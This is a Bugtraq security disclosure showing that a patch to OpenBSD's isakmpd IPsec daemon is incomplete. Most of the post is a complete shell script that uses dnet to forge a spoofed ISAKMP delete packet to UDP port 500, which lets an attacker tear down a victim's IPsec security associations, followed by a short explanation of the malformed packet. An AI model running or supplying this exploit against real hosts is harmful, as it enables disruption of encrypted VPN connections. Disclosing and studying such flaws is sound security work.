Re: unauthorized deletion of IPsec SAs in isakmpd, still

[Thomas Walpuski <thomas-bugtraq () unproved org>]

Hakan Olsson quickly provided a patch against the specific attack shown
in my last posting. A slightly modified attack still succeeds:

  attacker# cat we_have_been_auditing_since_the_summer_of_1996¹
  #!/bin/sh
  
  if [ ! $# -eq 3 ]; then
    echo "usage: $0 fake_src victim spi";
    exit;
  fi
  
  src=$1; dst=$2
  spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
  cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
  
  dnet hex \
    $cky_i \
    "\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x08\x10\x05\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x5c" \
      "\x01\x00\x00\x04" \
      "\x0c\x00\x00\x2c" \
      "\x00\x00\x00\x01" \
      "\x00\x00\x00\x01" \
        "\x00\x00\x00\x20" \
        "\x01\x01\x00\x01" \
        "\x00\x00\x00\x18" \
        "\x00\x01\x00\x00" \
        "\x80\x01\x00\x05" \
        "\x80\x02\x00\x02" \
        "\x80\x03\x00\x01" \
        "\x80\x04\x00\x02" \
      "\x00\x00\x00\x10" \
      "\x00\x00\x00\x01" \
      "\x03\x04\x00\x01" \
      $spi |
  dnet udp sport 500 dport 500 |
  dnet ip proto udp src $src dst $dst |
  dnet send

"Let him who have understanding reckon the" nonsense of this packet:
It's a message in an informational exchange with responder cookie and
message ID zero containing a hash payload of effective length zero, a SA
and a delete payload. That's an ambitious candidate for the Museum of
Broken Packets ;-).

Thomas Walpuski

1 - http://openbsd.org/security.html#process